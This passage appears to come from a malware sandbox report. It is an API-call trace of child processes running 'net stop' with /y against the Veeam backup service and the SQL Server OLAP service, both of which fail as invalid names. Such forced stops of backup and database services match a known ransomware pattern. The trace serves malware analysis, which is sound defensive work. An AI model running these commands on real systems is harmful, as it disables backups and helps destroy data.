4 [0219.685] setlocale (category=0, locale=".437") returned="English_United States.437" [0219.687] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0219.687] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0219.687] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamDeploySvc /y" [0219.688] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f5dc, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0219.688] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x70) returned 0x343c18 [0219.688] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0219.688] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14f7e0 | out: Buffer=0x14f7e0*=0x341c78) returned 0x0 [0219.688] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14f7e0 | out: Buffer=0x14f7e0*=0x341c90) returned 0x0 [0219.688] _fileno (_File=0x74eb2900) returned -2 [0219.688] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0219.688] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0219.688] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0219.688] _wcsicmp (_String1="config", _String2="stop") returned -16 [0219.688] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0219.688] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0219.688] _wcsicmp (_String1="file", _String2="stop") returned -13 [0219.688] _wcsicmp (_String1="files", _String2="stop") returned -13 [0219.688] _wcsicmp (_String1="group", _String2="stop") returned -12 [0219.688] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0219.688] _wcsicmp (_String1="help", _String2="stop") returned -11 [0219.688] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0219.689] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0219.689] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0219.689] _wcsicmp (_String1="session", _String2="stop") returned -15 [0219.689] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0219.689] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0219.689] _wcsicmp (_String1="share", _String2="stop") returned -12 [0219.689] _wcsicmp (_String1="start", _String2="stop") returned -14 [0219.689] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0219.689] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0219.689] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0219.689] _wcsicmp (_String1="accounts", _String2="VeeamDeploySvc") returned -21 [0219.689] _wcsicmp (_String1="computer", _String2="VeeamDeploySvc") returned -19 [0219.689] _wcsicmp (_String1="config", _String2="VeeamDeploySvc") returned -19 [0219.689] _wcsicmp (_String1="continue", _String2="VeeamDeploySvc") returned -19 [0219.689] _wcsicmp (_String1="cont", _String2="VeeamDeploySvc") returned -19 [0219.689] _wcsicmp (_String1="file", _String2="VeeamDeploySvc") returned -16 [0219.689] _wcsicmp (_String1="files", _String2="VeeamDeploySvc") returned -16 [0219.689] _wcsicmp (_String1="group", _String2="VeeamDeploySvc") returned -15 [0219.689] _wcsicmp (_String1="groups", _String2="VeeamDeploySvc") returned -15 [0219.689] _wcsicmp (_String1="help", _String2="VeeamDeploySvc") returned -14 [0219.689] _wcsicmp (_String1="helpmsg", _String2="VeeamDeploySvc") returned -14 [0219.689] _wcsicmp (_String1="localgroup", _String2="VeeamDeploySvc") returned -10 [0219.689] _wcsicmp (_String1="pause", _String2="VeeamDeploySvc") returned -6 [0219.689] _wcsicmp (_String1="session", _String2="VeeamDeploySvc") returned -3 [0219.689] _wcsicmp (_String1="sessions", _String2="VeeamDeploySvc") returned -3 [0219.689] _wcsicmp (_String1="sess", _String2="VeeamDeploySvc") returned -3 [0219.689] _wcsicmp (_String1="share", _String2="VeeamDeploySvc") returned -3 [0219.689] _wcsicmp (_String1="start", _String2="VeeamDeploySvc") returned -3 [0219.689] _wcsicmp (_String1="stats", _String2="VeeamDeploySvc") returned -3 [0219.689] _wcsicmp (_String1="statistics", _String2="VeeamDeploySvc") returned -3 [0219.689] _wcsicmp (_String1="stop", _String2="VeeamDeploySvc") returned -3 [0219.689] _wcsicmp (_String1="time", _String2="VeeamDeploySvc") returned -2 [0219.689] _wcsicmp (_String1="user", _String2="VeeamDeploySvc") returned -1 [0219.689] _wcsicmp (_String1="users", _String2="VeeamDeploySvc") returned -1 [0219.689] _wcsicmp (_String1="msg", _String2="VeeamDeploySvc") returned -9 [0219.689] _wcsicmp (_String1="messenger", _String2="VeeamDeploySvc") returned -9 [0219.690] _wcsicmp (_String1="receiver", _String2="VeeamDeploySvc") returned -4 [0219.690] _wcsicmp (_String1="rcv", _String2="VeeamDeploySvc") returned -4 [0219.690] _wcsicmp (_String1="netpopup", _String2="VeeamDeploySvc") returned -8 [0219.690] _wcsicmp (_String1="redirector", _String2="VeeamDeploySvc") returned -4 [0219.690] _wcsicmp (_String1="redir", _String2="VeeamDeploySvc") returned -4 [0219.690] _wcsicmp (_String1="rdr", _String2="VeeamDeploySvc") returned -4 [0219.690] _wcsicmp (_String1="workstation", _String2="VeeamDeploySvc") returned 1 [0219.690] _wcsicmp (_String1="work", _String2="VeeamDeploySvc") returned 1 [0219.690] _wcsicmp (_String1="wksta", _String2="VeeamDeploySvc") returned 1 [0219.690] _wcsicmp (_String1="prdr", _String2="VeeamDeploySvc") returned -6 [0219.690] _wcsicmp (_String1="devrdr", _String2="VeeamDeploySvc") returned -18 [0219.690] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamDeploySvc") returned -10 [0219.690] _wcsicmp (_String1="server", _String2="VeeamDeploySvc") returned -3 [0219.690] _wcsicmp (_String1="svr", _String2="VeeamDeploySvc") returned -3 [0219.690] _wcsicmp (_String1="srv", _String2="VeeamDeploySvc") returned -3 [0219.690] _wcsicmp (_String1="lanmanserver", _String2="VeeamDeploySvc") returned -10 [0219.690] _wcsicmp (_String1="alerter", _String2="VeeamDeploySvc") returned -21 [0219.690] _wcsicmp (_String1="netlogon", _String2="VeeamDeploySvc") returned -8 [0219.690] _wcsupr (in: _String="VeeamDeploySvc" | out: _String="VEEAMDEPLOYSVC") returned="VEEAMDEPLOYSVC" [0219.690] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3454d8 [0219.693] GetServiceKeyNameW (in: hSCManager=0x3454d8, lpDisplayName="VEEAMDEPLOYSVC", lpServiceName=0x8faaf0, lpcchBuffer=0x14f77c | out: lpServiceName="", lpcchBuffer=0x14f77c) returned 0 [0219.693] _wcsicmp (_String1="msg", _String2="VEEAMDEPLOYSVC") returned -9 [0219.693] _wcsicmp (_String1="messenger", _String2="VEEAMDEPLOYSVC") returned -9 [0219.693] _wcsicmp (_String1="receiver", _String2="VEEAMDEPLOYSVC") returned -4 [0219.693] _wcsicmp (_String1="rcv", _String2="VEEAMDEPLOYSVC") returned -4 [0219.693] _wcsicmp (_String1="redirector", _String2="VEEAMDEPLOYSVC") returned -4 [0219.693] _wcsicmp (_String1="redir", _String2="VEEAMDEPLOYSVC") returned -4 [0219.693] _wcsicmp (_String1="rdr", _String2="VEEAMDEPLOYSVC") returned -4 [0219.694] _wcsicmp (_String1="workstation", _String2="VEEAMDEPLOYSVC") returned 1 [0219.694] _wcsicmp (_String1="work", _String2="VEEAMDEPLOYSVC") returned 1 [0219.694] _wcsicmp (_String1="wksta", _String2="VEEAMDEPLOYSVC") returned 1 [0219.694] _wcsicmp (_String1="prdr", _String2="VEEAMDEPLOYSVC") returned -6 [0219.694] _wcsicmp (_String1="devrdr", _String2="VEEAMDEPLOYSVC") returned -18 [0219.694] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMDEPLOYSVC") returned -10 [0219.694] _wcsicmp (_String1="server", _String2="VEEAMDEPLOYSVC") returned -3 [0219.694] _wcsicmp (_String1="svr", _String2="VEEAMDEPLOYSVC") returned -3 [0219.694] _wcsicmp (_String1="srv", _String2="VEEAMDEPLOYSVC") returned -3 [0219.694] _wcsicmp (_String1="lanmanserver", _String2="VEEAMDEPLOYSVC") returned -10 [0219.694] _wcsicmp (_String1="alerter", _String2="VEEAMDEPLOYSVC") returned -21 [0219.694] _wcsicmp (_String1="netlogon", _String2="VEEAMDEPLOYSVC") returned -8 [0219.694] NetServiceControl (in: servername=0x0, service="VEEAMDEPLOYSVC", opcode=0x0, arg=0x0, bufptr=0x14f778 | out: bufptr=0x14f778) returned 0x889 [0219.695] wcscpy_s (in: _Destination=0x8fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0219.695] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0219.695] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x8fb338, nSize=0x800, Arguments=0x8f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0219.697] GetFileType (hFile=0x26c) returned 0x3 [0219.697] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x344008 [0219.697] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x344008, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0219.697] WriteFile (in: hFile=0x26c, lpBuffer=0x344008, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x14f6b8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f6b8, lpOverlapped=0x0) returned 0 [0219.697] LocalFree (hMem=0x344008) returned 0x0 [0219.697] GetFileType (hFile=0x26c) returned 0x3 [0219.697] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3462b0 [0219.697] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3462b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n4", lpUsedDefaultChar=0x0) returned 2 [0219.697] WriteFile (in: hFile=0x26c, lpBuffer=0x3462b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14f6b8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f6b8, lpOverlapped=0x0) returned 0 [0219.697] LocalFree (hMem=0x3462b0) returned 0x0 [0219.697] _ultow (in: _Dest=0x889, _Radix=1373928 | out: _Dest=0x889) returned="2185" [0219.697] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x8fb338, nSize=0x800, Arguments=0x8f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0219.697] GetFileType (hFile=0x26c) returned 0x3 [0219.697] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3462b0 [0219.697] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3462b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0219.697] WriteFile (in: hFile=0x26c, lpBuffer=0x3462b0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x14f6c4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f6c4, lpOverlapped=0x0) returned 0 [0219.697] LocalFree (hMem=0x3462b0) returned 0x0 [0219.697] GetFileType (hFile=0x26c) returned 0x3 [0219.697] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3462b0 [0219.698] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3462b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n4", lpUsedDefaultChar=0x0) returned 2 [0219.698] WriteFile (in: hFile=0x26c, lpBuffer=0x3462b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14f6c4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f6c4, lpOverlapped=0x0) returned 0 [0219.698] LocalFree (hMem=0x3462b0) returned 0x0 [0219.698] NetApiBufferFree (Buffer=0x341c78) returned 0x0 [0219.698] NetApiBufferFree (Buffer=0x341c90) returned 0x0 [0219.698] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamDeploySvc /y" [0219.698] exit (_Code=2) Process: id = "390" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x61c93000" os_pid = "0x8e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQLServerOLAPService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 566 os_tid = 0x880 Process: id = "391" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x51122000" os_pid = "0x904" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "390" os_parent_pid = "0x8e4" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLServerOLAPService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 567 os_tid = 0x900 [0219.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32f7c8 | out: lpSystemTimeAsFileTime=0x32f7c8*(dwLowDateTime=0x4c3f1d60, dwHighDateTime=0x1d57a87)) [0219.873] GetCurrentProcessId () returned 0x904 [0219.873] GetCurrentThreadId () returned 0x900 [0219.873] GetTickCount () returned 0x11707fd [0219.873] QueryPerformanceCounter (in: lpPerformanceCount=0x32f7c0 | out: lpPerformanceCount=0x32f7c0*=34015733847) returned 1 [0219.873] GetModuleHandleA (lpModuleName=0x0) returned 0x200000 [0219.873] __set_app_type (_Type=0x1) [0219.873] __p__fmode () returned 0x74eb31f4 [0219.873] __p__commode () returned 0x74eb31fc [0219.873] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x20ffe6) returned 0x0 [0219.873] __getmainargs (in: _Argc=0x219064, _Argv=0x21906c, _Env=0x219068, _DoWildCard=0, _StartInfo=0x219024 | out: _Argc=0x219064, _Argv=0x21906c, _Env=0x219068) returned 0 [0219.873] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0219.874] GetConsoleOutputCP () returned 0x1b5 [0219.874] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x219080 | out: lpCPInfo=0x219080) returned 1 [0219.874] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.877] sprintf_s (in: _DstBuf=0x32f780, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0219.877] setlocale (category=0, locale=".437") returned="English_United States.437" [0219.879] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0219.879] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0219.879] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerOLAPService /y" [0219.879] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x32f54c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0219.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x784bf8 [0219.880] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0219.880] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x32f750 | out: Buffer=0x32f750*=0x781c90) returned 0x0 [0219.880] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x32f750 | out: Buffer=0x32f750*=0x781ca8) returned 0x0 [0219.880] _fileno (_File=0x74eb2900) returned -2 [0219.880] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0219.880] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0219.880] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0219.880] _wcsicmp (_String1="config", _String2="stop") returned -16 [0219.880] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0219.880] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0219.880] _wcsicmp (_String1="file", _String2="stop") returned -13 [0219.880] _wcsicmp (_String1="files", _String2="stop") returned -13 [0219.880] _wcsicmp (_String1="group", _String2="stop") returned -12 [0219.880] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0219.880] _wcsicmp (_String1="help", _String2="stop") returned -11 [0219.880] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0219.880] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0219.880] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0219.880] _wcsicmp (_String1="session", _String2="stop") returned -15 [0219.880] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0219.880] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0219.880] _wcsicmp (_String1="share", _String2="stop") returned -12 [0219.880] _wcsicmp (_String1="start", _String2="stop") returned -14 [0219.881] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0219.881] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0219.881] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0219.881] _wcsicmp (_String1="accounts", _String2="MSSQLServerOLAPService") returned -12 [0219.881] _wcsicmp (_String1="computer", _String2="MSSQLServerOLAPService") returned -10 [0219.881] _wcsicmp (_String1="config", _String2="MSSQLServerOLAPService") returned -10 [0219.881] _wcsicmp (_String1="continue", _String2="MSSQLServerOLAPService") returned -10 [0219.881] _wcsicmp (_String1="cont", _String2="MSSQLServerOLAPService") returned -10 [0219.881] _wcsicmp (_String1="file", _String2="MSSQLServerOLAPService") returned -7 [0219.881] _wcsicmp (_String1="files", _String2="MSSQLServerOLAPService") returned -7 [0219.881] _wcsicmp (_String1="group", _String2="MSSQLServerOLAPService") returned -6 [0219.881] _wcsicmp (_String1="groups", _String2="MSSQLServerOLAPService") returned -6 [0219.881] _wcsicmp (_String1="help", _String2="MSSQLServerOLAPService") returned -5 [0219.881] _wcsicmp (_String1="helpmsg", _String2="MSSQLServerOLAPService") returned -5 [0219.881] _wcsicmp (_String1="localgroup", _String2="MSSQLServerOLAPService") returned -1 [0219.881] _wcsicmp (_String1="pause", _String2="MSSQLServerOLAPService") returned 3 [0219.881] _wcsicmp (_String1="session", _String2="MSSQLServerOLAPService") returned 6 [0219.881] _wcsicmp (_String1="sessions", _String2="MSSQLServerOLAPService") returned 6 [0219.881] _wcsicmp (_String1="sess", _String2="MSSQLServerOLAPService") returned 6 [0219.881] _wcsicmp (_String1="share", _String2="MSSQLServerOLAPService") returned 6 [0219.881] _wcsicmp (_String1="start", _String2="MSSQLServerOLAPService") returned 6 [0219.881] _wcsicmp (_String1="stats", _String2="MSSQLServerOLAPService") returned 6 [0219.881] _wcsicmp (_String1="statistics", _String2="MSSQLServerOLAPService") returned 6 [0219.881] _wcsicmp (_String1="stop", _String2="MSSQLServerOLAPService") returned 6 [0219.881] _wcsicmp (_String1="time", _String2="MSSQLServerOLAPService") returned 7 [0219.881] _wcsicmp (_String1="user", _String2="MSSQLServerOLAPService") returned 8 [0219.881] _wcsicmp (_String1="users", _String2="MSSQLServerOLAPService") returned 8 [0219.881] _wcsicmp (_String1="msg", _String2="MSSQLServerOLAPService") returned -12 [0219.881] _wcsicmp (_String1="messenger", _String2="MSSQLServerOLAPService") returned -14 [0219.881] _wcsicmp (_String1="receiver", _String2="MSSQLServerOLAPService") returned 5 [0219.881] _wcsicmp (_String1="rcv", _String2="MSSQLServerOLAPService") returned 5 [0219.881] _wcsicmp (_String1="netpopup", _String2="MSSQLServerOLAPService") returned 1 [0219.881] _wcsicmp (_String1="redirector", _String2="MSSQLServerOLAPService") returned 5 [0219.881] _wcsicmp (_String1="redir", _String2="MSSQLServerOLAPService") returned 5 [0219.881] _wcsicmp (_String1="rdr", _String2="MSSQLServerOLAPService") returned 5 [0219.881] _wcsicmp (_String1="workstation", _String2="MSSQLServerOLAPService") returned 10 [0219.882] _wcsicmp (_String1="work", _String2="MSSQLServerOLAPService") returned 10 [0219.882] _wcsicmp (_String1="wksta", _String2="MSSQLServerOLAPService") returned 10 [0219.882] _wcsicmp (_String1="prdr", _String2="MSSQLServerOLAPService") returned 3 [0219.882] _wcsicmp (_String1="devrdr", _String2="MSSQLServerOLAPService") returned -9 [0219.882] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLServerOLAPService") returned -1 [0219.882] _wcsicmp (_String1="server", _String2="MSSQLServerOLAPService") returned 6 [0219.882] _wcsicmp (_String1="svr", _String2="MSSQLServerOLAPService") returned 6 [0219.882] _wcsicmp (_String1="srv", _String2="MSSQLServerOLAPService") returned 6 [0219.882] _wcsicmp (_String1="lanmanserver", _String2="MSSQLServerOLAPService") returned -1 [0219.882] _wcsicmp (_String1="alerter", _String2="MSSQLServerOLAPService") returned -12 [0219.882] _wcsicmp (_String1="netlogon", _String2="MSSQLServerOLAPService") returned 1 [0219.882] _wcsupr (in: _String="MSSQLServerOLAPService" | out: _String="MSSQLSERVEROLAPSERVICE") returned="MSSQLSERVEROLAPSERVICE" [0219.882] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7854c8 [0219.889] GetServiceKeyNameW (in: hSCManager=0x7854c8, lpDisplayName="MSSQLSERVEROLAPSERVICE", lpServiceName=0x21aaf0, lpcchBuffer=0x32f6ec | out: lpServiceName="", lpcchBuffer=0x32f6ec) returned 0 [0219.889] _wcsicmp (_String1="msg", _String2="MSSQLSERVEROLAPSERVICE") returned -12 [0219.889] _wcsicmp (_String1="messenger", _String2="MSSQLSERVEROLAPSERVICE") returned -14 [0219.889] _wcsicmp (_String1="receiver", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0219.889] _wcsicmp (_String1="rcv", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0219.889] _wcsicmp (_String1="redirector", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0219.889] _wcsicmp (_String1="redir", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0219.889] _wcsicmp (_String1="rdr", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0219.889] _wcsicmp (_String1="workstation", _String2="MSSQLSERVEROLAPSERVICE") returned 10 [0219.890] _wcsicmp (_String1="work", _String2="MSSQLSERVEROLAPSERVICE") returned 10 [0219.890] _wcsicmp (_String1="wksta", _String2="MSSQLSERVEROLAPSERVICE") returned 10 [0219.890] _wcsicmp (_String1="prdr", _String2="MSSQLSERVEROLAPSERVICE") returned 3 [0219.890] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVEROLAPSERVICE") returned -9 [0219.890] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVEROLAPSERVICE") returned -1 [0219.890] _wcsicmp (_String1="server", _String2="MSSQLSERVEROLAPSERVICE") returned 6 [0219.890] _wcsicmp (_String1="svr", _String2="MSSQLSERVEROLAPSERVICE") returned 6 [0219.890] _wcsicmp (_String1="srv", _String2="MSSQLSERVEROLAPSERVICE") returned 6 [0219.890] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVEROLAPSERVICE") returned -1 [0219.890] _wcsicmp (_String1="alerter", _String2="MSSQLSERVEROLAPSERVICE") returned -12 [0219.890] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVEROLAPSERVICE") returned 1 [0219.890] NetServiceControl (in: servername=0x0, service="MSSQLSERVEROLAPSERVICE", opcode=0x0, arg=0x0, bufptr=0x32f6e8 | out: bufptr=0x32f6e8) returned 0x889 [0219.891] wcscpy_s (in: _Destination=0x21a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0219.891] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0219.892] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x21b338, nSize=0x800, Arguments=0x219dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0219.893] GetFileType (hFile=0x26c) returned 0x3 [0219.893] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x783ca0 [0219.893] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x783ca0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0219.893] WriteFile (in: hFile=0x26c, lpBuffer=0x783ca0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x32f628, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32f628, lpOverlapped=0x0) returned 0 [0219.893] LocalFree (hMem=0x783ca0) returned 0x0 [0219.893] GetFileType (hFile=0x26c) returned 0x3 [0219.893] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x786290 [0219.893] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x786290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nx", lpUsedDefaultChar=0x0) returned 2 [0219.893] WriteFile (in: hFile=0x26c, lpBuffer=0x786290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x32f628, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32f628, lpOverlapped=0x0) returned 0 [0219.893] LocalFree (hMem=0x786290) returned 0x0 [0219.893] _ultow (in: _Dest=0x889, _Radix=3339864 | out: _Dest=0x889) returned="2185" [0219.893] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x21b338, nSize=0x800, Arguments=0x219dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0219.893] GetFileType (hFile=0x26c) returned 0x3 [0219.893] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x786290 [0219.893] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x786290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0219.893] WriteFile (in: hFile=0x26c, lpBuffer=0x786290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x32f634, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32f634, lpOverlapped=0x0) returned 0 [0219.893] LocalFree (hMem=0x786290) returned 0x0 [0219.893] GetFileType (hFile=0x26c) returned 0x3 [0219.894] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x786290 [0219.894] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x786290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nx", lpUsedDefaultChar=0x0) returned 2 [0219.894] WriteFile (in: hFile=0x26c, lpBuffer=0x786290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x32f634, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32f634, lpOverlapped=0x0) returned 0 [0219.894] LocalFree (hMem=0x786290) returned 0x0 [0219.894] NetApiBufferFree (Buffer=0x781c90) returned 0x0 [0219.894] NetApiBufferFree (Buffer=0x781ca8) returned 0x0 [0219.894] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerOLAPService /y" [0219.894] exit (_Code=2) Process: id = "392" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xa7e5000" os_pid = "0x2cc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "108" os_parent_pid = "0x36c" cmd_line = 